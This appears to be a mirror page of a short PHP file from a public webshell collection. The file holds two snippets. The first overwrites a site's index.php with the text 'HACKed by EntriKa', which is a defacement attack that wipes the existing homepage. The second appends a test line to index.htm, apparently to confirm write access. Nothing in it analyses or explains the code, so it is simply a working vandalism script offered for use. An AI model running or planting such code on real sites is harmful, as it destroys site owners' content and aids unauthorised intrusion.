mirror of
https://github.com/tennc/webshell
synced 2024-11-22 19:23:05 +00:00
14 lines
213 B
Text
14 lines
213 B
Text
|
<?php
|
||
|
$entry_line="HACKed by EntriKa";
|
||
|
$fp = fopen("index.php", "w");
|
||
|
fputs($fp, $entry_line);
|
||
|
fclose($fp);
|
||
|
?>
|
||
|
|
||
|
<?
|
||
|
$fp =@fopen("index.htm", "a+");
|
||
|
$yazi = "test" . "\r\n";
|
||
|
fwrite ($fp, "$yazi");
|
||
|
fclose ($fp);
|
||
|
?>
|